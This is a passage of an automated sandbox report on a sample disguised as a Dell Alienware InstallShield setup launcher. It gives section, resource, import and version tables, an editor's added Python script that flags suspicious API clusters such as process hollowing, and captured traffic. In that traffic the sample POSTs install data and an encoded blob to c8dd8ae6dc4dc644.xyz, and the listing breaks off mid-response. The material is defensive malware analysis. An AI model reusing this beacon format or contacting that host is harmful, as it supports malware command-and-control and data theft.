.text  | 0x1000          | 0x74497      | 0x74600  | False    | 0.513208243824  | data      | 6.58470653969 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x76000         | 0x2662a      | 0x26800  | False    | 0.360135957792  | data      | 4.65071874944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0x9d000         | 0xa970       | 0x2400   | False    | 0.295789930556  | data      | 4.48877485279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc  | 0xa8000         | 0x498ec      | 0x49a00  | False    | 0.341989203098  | data      | 6.45902686047 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf2000         | 0x1f3b6      | 0x1f400  | False    | 0.0011484375    | data      | 0.0           | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name          | RVA     | Size    | Type | Language | Country
GIF           | 0xa8db4 | 0x339f  | GIF image data, version 89a, 350 x 624 | English | United States
PNG           | 0xac154 | 0x39ed  | PNG image data, 360 x 150, 8-bit/color RGBA, non-interlaced | |
PNG           | 0xafb44 | 0x2fc9  | PNG image data, 240 x 227, 8-bit/color RGBA, non-interlaced | |
RT_BITMAP     | 0xb2b10 | 0x14220 | data | |
RT_BITMAP     | 0xc6d30 | 0x1b5c  | data | |
RT_BITMAP     | 0xc888c | 0x38e4  | data | |
RT_BITMAP     | 0xcc170 | 0x1238  | data | |
RT_BITMAP     | 0xcd3a8 | 0x6588  | data | |
RT_BITMAP     | 0xd3930 | 0x11f88 | data | |
RT_ICON       | 0xe58b8 | 0x468   | GLS_BINARY_LSB_FIRST | |
RT_ICON       | 0xe5d20 | 0x10a8  | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4289178028, next used block 4289178028 | |
RT_ICON       | 0xe6dc8 | 0x25a8  | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4289178028, next used block 4289178028 | |
RT_ICON       | 0xe9370 | 0x2e8   | data | |
RT_ICON       | 0xe9658 | 0x2e8   | data | |
RT_DIALOG     | 0xe9940 | 0x1ce   | data | |
RT_DIALOG     | 0xe9b10 | 0x266   | data | |
RT_DIALOG     | 0xe9d78 | 0x2b0   | data | |
RT_DIALOG     | 0xea028 | 0x54    | data | |
RT_DIALOG     | 0xea07c | 0x34    | data | |
RT_DIALOG     | 0xea0b0 | 0xd6    | data | |
RT_DIALOG     | 0xea188 | 0x114   | data | |
RT_DIALOG     | 0xea29c | 0xd6    | data | |
RT_DIALOG     | 0xea374 | 0x246   | data | |
RT_DIALOG     | 0xea5bc | 0x3c8   | data | |
RT_DIALOG     | 0xea984 | 0x14e   | data | |
RT_DIALOG     | 0xeaad4 | 0x1e8   | data | |
RT_DIALOG     | 0xeacbc | 0x1c6   | data | |
RT_DIALOG     | 0xeae84 | 0x1ee   | data | |
RT_DIALOG     | 0xeb074 | 0x7c    | data | |
RT_DIALOG     | 0xeb0f0 | 0x3bc   | data | |
RT_DIALOG     | 0xeb4ac | 0x158   | data | |
RT_DIALOG     | 0xeb604 | 0x1da   | data | |
RT_DIALOG     | 0xeb7e0 | 0x10a   | data | |
RT_DIALOG     | 0xeb8ec | 0xde    | data | |
RT_DIALOG     | 0xeb9cc | 0x1d4   | data | |
RT_DIALOG     | 0xebba0 | 0x1dc   | data | |
RT_DIALOG     | 0xebd7c | 0x294   | data | |
RT_STRING     | 0xec010 | 0x160   | data | English | United States
RT_STRING     | 0xec170 | 0x23e   | data | English | United States
RT_STRING     | 0xec3b0 | 0x378   | data | English | United States
RT_STRING     | 0xec728 | 0x252   | data | English | United States
RT_STRING     | 0xec97c | 0x1f4   | data | English | United States
RT_STRING     | 0xecb70 | 0x66a   | data | English | United States
RT_STRING     | 0xed1dc | 0x366   | data | English | United States
RT_STRING     | 0xed544 | 0x27e   | data | English | United States
RT_STRING     | 0xed7c4 | 0x518   | data | English | United States
RT_STRING     | 0xedcdc | 0x882   | data | English | United States
RT_STRING     | 0xee560 | 0x23e   | data | English | United States
RT_STRING     | 0xee7a0 | 0x3ba   | data | English | United States
RT_STRING     | 0xeeb5c | 0x12c   | data | English | United States
RT_STRING     | 0xeec88 | 0x4a    | data | English | United States
RT_STRING     | 0xeecd4 | 0xda    | data | English | United States
RT_STRING     | 0xeedb0 | 0x110   | data | English | United States
RT_STRING     | 0xeeec0 | 0x20a   | data | English | United States
RT_STRING     | 0xef0cc | 0xba    | data | English | United States
RT_STRING     | 0xef188 | 0xa8    | data | English | United States
RT_STRING     | 0xef230 | 0x12a   | data | English | United States
RT_STRING     | 0xef35c | 0x422   | data | English | United States
RT_STRING     | 0xef780 | 0x5c2   | data | English | United States
RT_STRING     | 0xefd44 | 0x40    | data | English | United States
RT_STRING     | 0xefd84 | 0xcaa   | data | English | United States
RT_STRING     | 0xf0a30 | 0x284   | data | English | United States
RT_GROUP_ICON | 0xf0cb4 | 0x30    | data | |
RT_GROUP_ICON | 0xf0ce4 | 0x14    | data | |
RT_GROUP_ICON | 0xf0cf8 | 0x14    | data | |
RT_VERSION    | 0xf0d0c | 0x428   | data | |
RT_MANIFEST   | 0xf1134 | 0x535   | XML 1.0 document, ASCII text, with CRLF line terminators | |
RT_MANIFEST   | 0xf166c | 0x280   | XML 1.0 document text | English | United States

Imports

DLL | Import
COMCTL32.dll | (no named imports listed)
KERNEL32.dll | LoadLibraryW, lstrcmpW, lstrcmpiW, GetSystemDefaultLangID, GetUserDefaultLangID, VerLanguageNameW, CompareFileTime, CreateDirectoryW, FindClose, FindFirstFileW, FindNextFileW, SetFileAttributesW, GetSystemTimeAsFileTime, GetPrivateProfileStringW, MoveFileW, LocalFree, FormatMessageW, GetSystemInfo, MulDiv, RaiseException, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LoadLibraryExW, GetVersion, GetLocalTime, IsValidLocale, GetCommandLineW, GetFileAttributesW, GlobalAlloc, GlobalFree, FlushFileBuffers, VirtualQuery, IsBadReadPtr, GetDiskFreeSpaceExW, GetDriveTypeW, GetExitCodeProcess, GetCurrentThread, GetLocaleInfoW, InterlockedExchange, LoadLibraryExA, GetModuleHandleW, GetProcAddress, GetSystemDirectoryA, LoadLibraryA, GetLastError, SetLastError, CreateFileW, GetFileSize, CloseHandle, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, lstrlenA, MultiByteToWideChar, WideCharToMultiByte, ReadFile, SetFilePointer, WriteFile, HeapAlloc, lstrcmpA, SystemTimeToFileTime, ResetEvent, SetEvent, FindResourceExW, OpenProcess, GetProcessTimes, ReadConsoleW, WriteConsoleW, SetStdHandle, GetCurrentDirectoryW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, GetTimeFormatW, GetDateFormatW, OutputDebugStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetFileType, HeapReAlloc, GetStartupInfoW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeLibrary, CompareStringA, CompareStringW, lstrcatW, GetVersionExW, InterlockedDecrement, InterlockedIncrement, CreateEventW, QueryPerformanceFrequency, GetTempFileNameW, CopyFileW, GetTickCount, GetExitCodeThread, CreateThread, FindResourceW, GlobalUnlock, GlobalLock, SizeofResource, LockResource, LoadResource, lstrcpyW, SetErrorMode, GetTempPathW, ExpandEnvironmentStringsW, MoveFileExW, WriteProcessMemory, VirtualProtectEx, GetWindowsDirectoryW, GetSystemDirectoryW, FlushInstructionCache, SetThreadContext, GetThreadContext, CreateProcessW, ResumeThread, TerminateProcess, ExitProcess, GetCurrentProcess, Sleep, WaitForSingleObject, DuplicateHandle, RemoveDirectoryW, DeleteFileW, SetCurrentDirectoryW, lstrlenW, lstrcpynW, GetModuleFileNameW, GetProcessHeap, HeapFree, GetStringTypeW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetCurrentThreadId, HeapSize, GetModuleHandleExW, GetStdHandle, GetFullPathNameW, IsProcessorFeaturePresent, IsDebuggerPresent, RtlUnwind, LCMapStringW, DecodePointer, EncodePointer
USER32.dll | DefWindowProcW, PostMessageW, DispatchMessageW, TranslateMessage, GetMessageW, RegisterClassW, PostQuitMessage, CharPrevW, SendDlgItemMessageW, wvsprintfW, LoadImageW, CreateDialogParamW, MoveWindow, SetCursor, GetWindow, GetDlgItemTextW, SetFocus, EnableWindow, SetForegroundWindow, SetActiveWindow, SetDlgItemTextW, IsDialogMessageW, FindWindowW, SubtractRect, IntersectRect, SetRect, FillRect, GetSysColorBrush, GetSysColor, GetWindowRect, GetDC, GetSystemMetrics, GetDlgCtrlID, CreateDialogIndirectParamW, DestroyWindow, IsWindow, SendMessageW, MessageBoxW, CharNextW, WaitForInputIdle, SetWindowLongW, GetWindowLongW, GetClientRect, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, SetWindowPos, SetWindowTextW, GetDlgItem, ExitWindowsEx, CharUpperW, EndDialog, DialogBoxIndirectParamW, ShowWindow, GetDesktopWindow, MsgWaitForMultipleObjects, PeekMessageW, wsprintfW, LoadIconW, LoadCursorW, KillTimer, SetTimer, CreateWindowExW
GDI32.dll | TranslateCharsetInfo, UnrealizeObject, CreateHalftonePalette, GetDIBColorTable, SelectPalette, RealizePalette, GetSystemPaletteEntries, CreatePalette, CreateFontW, GetObjectW, SetTextColor, SetBkMode, GetDeviceCaps, CreateSolidBrush, CreateFontIndirectW, SetStretchBltMode, StretchBlt, SelectObject, DeleteDC, CreateDIBitmap, CreateCompatibleDC, BitBlt, DeleteObject, GetStockObject
ADVAPI32.dll | GetTokenInformation, RegOpenKeyExW, RegOpenKeyW, RegOverridePredefKey, LookupPrivilegeValueW, AdjustTokenPrivileges, RegCloseKey, FreeSid, EqualSid, AllocateAndInitializeSid, OpenThreadToken, OpenProcessToken, SetEntriesInAclW, SetSecurityDescriptorOwner, SetSecurityDescriptorGroup, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CreateWellKnownSid, RegQueryInfoKeyW, RegEnumKeyExW, RegDeleteKeyW, RegSetValueExW, RegEnumValueW, RegCreateKeyExW, RegDeleteValueW, RegQueryValueExW
SHELL32.dll | SHGetMalloc, ShellExecuteExW, SHGetPathFromIDListW, SHGetFolderPathW, SHBrowseForFolderW, ShellExecuteW, CommandLineToArgvW
ole32.dll | CoCreateInstance, CoCreateGuid, CLSIDFromProgID, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoInitializeSecurity, CoUninitialize
OLEAUT32.dll | UnRegisterTypeLib, RegisterTypeLib, SysAllocStringLen, SysFreeString, SysReAllocStringLen, SysStringLen, SysAllocString, SysStringByteLen, SysAllocStringByteLen, VarBstrCat, VarBstrFromDate, VariantClear, VariantChangeType, GetErrorInfo, VarUI4FromStr, SystemTimeToVariantTime, LoadTypeLib
SHLWAPI.dll | PathFileExistsW
RPCRT4.dll | RpcStringFreeW, UuidCreate, UuidToStringW
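
The KERNEL32 and ADVAPI32 rows above carry the API set a reverser pulls out first: CreateProcessW together with GetThreadContext, SetThreadContext, WriteProcessMemory, VirtualProtectEx, FlushInstructionCache and ResumeThread is the sequence used for process hollowing; LoadLibrary*/GetProcAddress mean the static table is not the whole story (the report's CheckRemoteDebuggerPresent signature, for instance, has no matching static import); and OpenProcessToken, LookupPrivilegeValueW and AdjustTokenPrivileges next to ExitWindowsEx line up with the shutdown/reboot signature. The script below is an added example, not code from the report or from Joe Sandbox, that scores an import table against such clusters. The cluster definitions are this editor's own heuristic, and SAMPLE_IMPORTS is a constructed subset of the table above limited to the names the clusters reference. One caveat: the Version Infos identify the file as an InstallShield setup launcher, whose own bootstrapping could account for much of this set, so the hits are triage leads to confirm against the unpacked stage, not a verdict.

```python
"""Triage a PE import table for API clusters worth a second look.

Added example, not part of the sandbox report. The clusters are this
editor's own heuristic (every name is a real Win32 export). SAMPLE_IMPORTS
is a constructed subset of the report's Imports table (KERNEL32, ADVAPI32
and USER32 rows) limited to the names the clusters reference.
"""
from typing import Dict, List, Set, Tuple

SAMPLE_IMPORTS: Dict[str, Set[str]] = {
    "KERNEL32.dll": {
        "LoadLibraryW", "LoadLibraryA", "LoadLibraryExW", "LoadLibraryExA",
        "GetProcAddress", "CreateProcessW", "GetThreadContext",
        "SetThreadContext", "WriteProcessMemory", "VirtualProtectEx",
        "FlushInstructionCache", "ResumeThread", "OpenProcess",
        "IsDebuggerPresent", "OutputDebugStringW", "GetDriveTypeW",
        "GetDiskFreeSpaceExW",
    },
    "ADVAPI32.dll": {
        "OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges",
    },
    "USER32.dll": {"ExitWindowsEx"},
}

# (cluster name, member APIs, minimum members present before it is reported)
CLUSTERS: List[Tuple[str, Set[str], int]] = [
    ("process-hollowing", {
        "CreateProcessW", "GetThreadContext", "SetThreadContext",
        "WriteProcessMemory", "VirtualProtectEx", "ResumeThread",
    }, 5),
    ("dynamic-api-resolution", {
        "LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
        "GetProcAddress",
    }, 2),
    ("privilege-adjust-and-shutdown", {
        "OpenProcessToken", "LookupPrivilegeValueW", "AdjustTokenPrivileges",
        "ExitWindowsEx",
    }, 4),
    ("anti-debug", {
        "IsDebuggerPresent", "OutputDebugStringW", "CheckRemoteDebuggerPresent",
    }, 1),
    ("drive-enumeration", {"GetDriveTypeW", "GetDiskFreeSpaceExW"}, 1),
]


def all_imports(imports: Dict[str, Set[str]]) -> Set[str]:
    """Flatten the per-DLL table into one set of imported names."""
    return set().union(*imports.values())


def match_clusters(imports: Dict[str, Set[str]]) -> Dict[str, List[str]]:
    """Return {cluster: sorted matched APIs} for every cluster whose
    minimum-member threshold is met by the static import table."""
    present = all_imports(imports)
    hits: Dict[str, List[str]] = {}
    for name, members, minimum in CLUSTERS:
        matched = sorted(members & present)
        if len(matched) >= minimum:
            hits[name] = matched
    return hits


def unresolved_members(imports: Dict[str, Set[str]], cluster: str) -> List[str]:
    """Cluster members absent from the static table. When the sample also
    hits dynamic-api-resolution, these are candidates for run-time lookup
    via GetProcAddress and belong on the list of things to confirm in the
    unpacked stage rather than being ruled out."""
    present = all_imports(imports)
    for name, members, _minimum in CLUSTERS:
        if name == cluster:
            return sorted(members - present)
    raise KeyError(cluster)


def triage_report(imports: Dict[str, Set[str]]) -> List[str]:
    """One human-readable line per reported cluster."""
    lines = []
    for name, matched in match_clusters(imports).items():
        gaps = unresolved_members(imports, name)
        note = f" (not statically imported: {', '.join(gaps)})" if gaps else ""
        lines.append(f"{name}: {', '.join(matched)}{note}")
    return lines


if __name__ == "__main__":
    for line in triage_report(SAMPLE_IMPORTS):
        print(line)
```

Run it on a table exported from pefile or the sandbox report: a process-hollowing hit means the next step is breaking on CreateProcessW with CREATE_SUSPENDED and dumping whatever WriteProcessMemory writes into the child, and the unresolved-members list tells you which names to look for in the unpacked stage's own imports or GetProcAddress strings.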

Version Infos

Description | Data
LegalCopyright | Copyright (c) 2018 Flexera. All Rights Reserved.
ISInternalVersion | 24.0.573
InternalName | Setup
FileVersion | 5.2.33.0
CompanyName | Dell Inc
Internal Build Number | 185990
ProductName | Alienware Command Center Suite
ProductVersion | 5.2.33.0
FileDescription | Setup Launcher Unicode
ISInternalDescription | Setup Launcher Unicode
OriginalFilename | InstallShield Setup.exe
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 30, 2021 14:31:11.635849953 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:11.823514938 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:11.823671103 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:11.824554920 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:11.824605942 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:12.012116909 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:12.012165070 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:12.335077047 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:12.365892887 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:12.365950108 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:12.553586006 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:12.553599119 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:13.742291927 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:13.787702084 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:13.833859921 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:13.833919048 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:14.022130966 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:14.022171021 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:17.383786917 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:17.428641081 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:19.318113089 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:19.318176031 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:19.505898952 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:19.505939007 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:22.825290918 CET | 80 | 49719 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:22.913503885 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:25.540046930 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:25.727830887 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:25.727924109 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:25.730926037 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:25.731009007 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:25.920118093 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:25.920156956 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:26.497304916 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:26.686372995 CET | 80 | 49723 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:26.686577082 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:26.687041998 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:26.687155962 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:26.877455950 CET | 80 | 49723 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:26.877482891 CET | 80 | 49723 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:27.603024960 CET | 49719 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:30.286595106 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:30.414025068 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:32.487735033 CET | 80 | 49723 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:32.726711035 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:33.553212881 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:33.553366899 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:33.742155075 CET | 80 | 49723 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:33.742188931 CET | 80 | 49723 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:37.934276104 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:37.934351921 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:38.112478018 CET | 80 | 49723 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:38.123282909 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:38.123300076 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:38.228832006 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:39.173599005 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:39.186463118 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:39.186546087 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:39.374016047 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:39.374053955 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:41.303073883 CET | 49723 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:43.455353975 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:43.545784950 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:43.785324097 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:43.785418987 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:43.972913027 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:43.972959042 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:45.013859987 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:45.142966032 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:45.143001080 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:45.332947016 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:45.332983971 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:49.696033001 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:49.710333109 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:31:49.900924921 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:50.896301031 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:31:51.025131941 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:07.928347111 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:07.928493023 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:08.116095066 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:32:08.116117001 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:32:12.093523979 CET | 80 | 49722 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:32:12.136184931 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:18.248153925 CET | 49739 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:18.436991930 CET | 80 | 49739 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:32:18.437107086 CET | 49739 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:18.439049006 CET | 49739 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:18.627670050 CET | 80 | 49739 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:32:20.674977064 CET | 80 | 49739 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:32:20.675368071 CET | 49739 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:20.863068104 CET | 80 | 49739 | 34.94.64.66 | 192.168.2.3
Jan 30, 2021 14:32:20.863217115 CET | 49739 | 80 | 192.168.2.3 | 34.94.64.66
Jan 30, 2021 14:32:23.566790104 CET | 49722 | 80 | 192.168.2.3 | 34.94.64.66

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 30, 2021 14:31:11.568495989 CET | 192.168.2.3 | 8.8.8.8 | 0xada2 | Standard query (0) | c8dd8ae6dc4dc644.xyz | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:25.467396975 CET | 192.168.2.3 | 8.8.8.8 | 0xc24b | Standard query (0) | c8dd8ae6dc4dc644.xyz | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:26.411195993 CET | 192.168.2.3 | 8.8.8.8 | 0x9506 | Standard query (0) | c8dd8ae6dc4dc644.xyz | A (IP address) | IN (0x0001)
Jan 30, 2021 14:32:18.156292915 CET | 192.168.2.3 | 8.8.8.8 | 0xfc84 | Standard query (0) | C8DD8AE6DC4DC644.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 30, 2021 14:31:11.625024080 CET | 8.8.8.8 | 192.168.2.3 | 0xada2 | No error (0) | c8dd8ae6dc4dc644.xyz | (none) | 34.94.64.66 | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:25.526074886 CET | 8.8.8.8 | 192.168.2.3 | 0xc24b | No error (0) | c8dd8ae6dc4dc644.xyz | (none) | 34.94.64.66 | A (IP address) | IN (0x0001)
Jan 30, 2021 14:31:26.472259045 CET | 8.8.8.8 | 192.168.2.3 | 0x9506 | No error (0) | c8dd8ae6dc4dc644.xyz | (none) | 34.94.64.66 | A (IP address) | IN (0x0001)
Jan 30, 2021 14:32:18.213793039 CET | 8.8.8.8 | 192.168.2.3 | 0xfc84 | No error (0) | C8DD8AE6DC4DC644.xyz | (none) | 34.94.64.66 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• c8dd8ae6dc4dc644.xyz

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49719 | 34.94.64.66 | 80 | C:\Users\user\Desktop\fnhcdXEfus.exe

Timestamp | kBytes transferred | Direction | Data
Jan 30, 2021 14:31:11.824554920 CET | 144 | OUT | POST //fine/send HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 84
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:11.824605942 CET | 144 | OUT | Data Ascii: type=install&seller=installp2&price=-0.3&guid=5014FFB57E6DEDA3&ver=45.0.0&origin=exe
Jan 30, 2021 14:31:12.335077047 CET | 149 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:12 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Jan 30, 2021 14:31:12.365892887 CET | 150 | OUT | POST /info_old/w HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    upgrade-insecure-requests: 1
    Content-Length: 93
    Host: c8dd8ae6dc4dc644.xyz
Jan 30, 2021 14:31:12.365950108 CET | 150 | OUT | Data Ascii: info=4u25ymXISBzxcYlN7t7LLMXXmLXgRIRUzuxzJ2SXfJqOtFsO5OiqWGslS15PBfOGsZMjY0xTPr3MrlrTRZuTjQ~~
Jan 30, 2021 14:31:13.742291927 CET | 169 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 30 Jan 2021 13:31:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
